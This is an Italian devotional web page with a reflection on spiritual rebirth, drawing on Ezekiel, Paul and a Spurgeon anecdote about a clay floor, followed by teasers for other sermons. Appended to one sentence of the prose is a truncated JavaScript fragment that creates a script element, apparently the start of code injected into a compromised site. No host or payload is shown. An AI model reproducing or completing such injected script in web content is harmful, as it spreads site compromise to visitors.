E’ necessario un pavimento nuovo

di M.R. DE HANN  –  ”E vi darò un cuor nuovo”. Ezechiele  36:26   –   Il messaggio della redenzione non è “miglioramento”, bensì “rinnovamento”. Paolo dice: “Se alcuno è in Cristo, è una nuova creatura”, (2 Cor.  5:17). La nuova nascita non è un miglioramento del vecchio uomo ma una nuova crea­zione. Non si tratta quindi di una riverniciatura. La natura del vecchio Adamo è così irrimediabilmente corrotta che Dio stesso non vuol cercare di ripararla o di migliorarla ma insiste perché si butti completamente via come rot­tame  per fare un uomo nuovo. Gesù dice: “Quel che è nato dalla carne, è carne; e quel che è nato dallo Spirito, è spirito. Non ti meravigliare se t’ho detto: Bisogna che nasciate di nuovo,, (Giovanni 3:6-7). La vecchia natura, che hai ricevuto alla nascita naturale, è senza speranza e migliorarla è più pericoloso che lasciarla nel suo stato d’ignoranza e di roz­zezza. Quanto più noi lavoriamo sul ’’vecchio uomo”, tanto più la vecchia natura viene contraffatta. Sai perché il pec­catore deve essere rigenerato? Perché alla sua prima na­scita tutto era a rovescio. Difatti è stato partorito con la parte superiore in basso. Il bambino nasce con la testa sotto e i piedi sopra. L’uomo viene al mondo con le spalle volte al cielo. Ma nella nuova nascita siamo trasformati e generati con la testa nella posizione giusta.

Spurgeon narra di un missionario che visitò la capanna di un indigeno provando grande disgusto davanti allo spor­co pavimento sul quale bisognava camminare e sedersi. Egli consigliò di strofinarne la superficie con acqua e sa­pone. Ma l’indigeno rispose: “Ciò non farebbe altro che peggiorare la cosa. Vedi, il pavimento è fatto di argilla indu­rita e seccata. Se sopra ci metti acqua, diventa fango. Quanto più cerchi di lavarlo, tanto più diventa peggiore”.  Già, nella capanna ci voleva qualcos’altro che un pavimento di terra. – Così accade anche col cuore umano: esso è duro e secco e nulla gli può giovare. L’uomo ha bisogno d’un cuore nuovo. Dobbiamo nascere dall’alto!

O Signore, nella tua grande misericordia scendi presto dal cielo.
Scrivi il tuo nome nel mio cuore nuovo, il nuovo nome del tuo amore.
Charles Wesley

Rifletti: La Bibbia la potremmo paragonare al sapone: chi ha più bisogno del sapone, abitualmente lo usa di meno.var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

IL CRISTIANESIMO È ESPERIENZA

di Roberto Bracco   –   I demolitori più tenaci del cristianesimo sono coloro che lo accettano senza penetrarlo. Quando il cristianesimo è vissuto superficialmente non è vissuto affatto ed anzi è oltraggiato e rovinato.  Il cristianesimo non si può rovinare e demolire in senso assoluto, ma si può offendere attraverso una testimonianza insincera e perciò coloro che si dichiarano cristiani, ma vivono soltanto alla superficie del cristianesimo possono essere definiti, …
Leggi Tutto

NON ERANO CHE DEI RAGAZZI

Uno studente dell’Università Yale (Usa), un giorno, intraprese una strenua difesa a favore dell’opera delle missioni al punto che fu espulso dalla sua scuola. Questo giovane si chiamava David Brainerd, grande missionario  e  pioniere  tra  i  Pellirossa.  Il suo diario, pubblicato dopo la sua morte, andò nelle mani di un calzolaio inglese: William Carey, che divenne una “colonna di fuoco”. Dio si usò di lui in India dove …
Leggi Tutto

LE VIE DI DIO SONO MIGLIORI

di  G.Campbell Morgan  –  Noi scegliamo per primi; Dio sceglie per secondo. La storia dimostra, e il futuro lo verificherà, che le vie di Dio sono migliori delle nostre. Il primo Adamo fallì, il secondo Adamo ebbe successo. Il primo figlio di Adamo (Caino) fu un assassino, il secondo (Abele) fu un martire. Il primo figlio di Abramo (Ismaele) era nato dalla carne, il secondo (Isacco) fu scelto …
Leggi Tutto

UNA CHIESA CONSCIA DI DIO

di Donald Gee  –   Lo stesso Dio che è stato una realtà per i cristiani del primo secolo desidera esserlo per i cristiani della presente generazione.  –   Recentemente, mentre rileggevo in Atti 15 la cronistoria del concilio di Gerusalemme, fui colpito, come mai prima, dell’enfasi posta su DIO. Questa enfasi porta sostanzialmente all’affermazione conclusiva : “E’ parso bene allo Spirito Santo ed a noi” (v. 28). Tale linguaggio …
Leggi Tutto

Storia di un inno: IT’S WELL WITH MY SOUL

 Horatio Spafford era un avvocato di successo ed un insegnante di giurisprudenza nella Chicago del 1860. Insieme a sua moglie, Anna, erano ben noti in città, sia per la carriera legale di Spafford, ma anche perché i due coniugi erano amici e sostenitori di D.L. Moody, famoso evangelista. La città di Chicago era in forte espansione, le attività industriali erano fiorenti e lo sviluppo sociale era in forte …
Leggi Tutto

PREGARE O REMARE?

di Billy Sunday  –  Billy Sunday era un famoso giocatore di baseball americano. Diede il suo cuore a Cristo e da famoso atleta divenne un famoso predicatore del Vangelo. –  “Gesù Cristo è lo stesso ieri, oggi e in eterno” (Ebrei 13: 8).  –  Soli in un piccolo battello ed esposti a una grande tempesta ci chiediamo: «Dobbiamo pregare o remare?» Viviamo in un mondo nel quale regna il …
Leggi Tutto

Promessa per oggi: La Mia bontà ha più valore della vita

Poiché la tua benignità vale più della vita, le mie labbra ti loderanno. (Salmo 63:3)  –  In questa promessa, il salmista fa una dichiarazione sulla straordinaria bontà di Dio e di come il suo amore vale più della vita stessa. Lo scrittore continua dicendo che l’unica risposta adeguata ad un amore così meraviglioso è quella di vivere la vita rispondendo all’amore di Dio  presentando a Lui i nostri corpi …
Leggi Tutto

FUOCO SPIRITUALE

Samuel Chadwick  –  ” Il nostro Dio è un fuoco consumante”. Il simbolo scelto della Sua presenza è il fuoco acceso sulla terra, e il segno preferito della Sua approvazione è la fiamma che consuma il sacrificio. Patto e sacrificio, santuario e consacrazione, erano santificati ed approvati con la discesa del fuoco celeste. “Dio che risponde per mezzo della fiamma di fuoco; Lui è Dio!” Gesù è venuto …
Leggi Tutto

Dai nostri Culti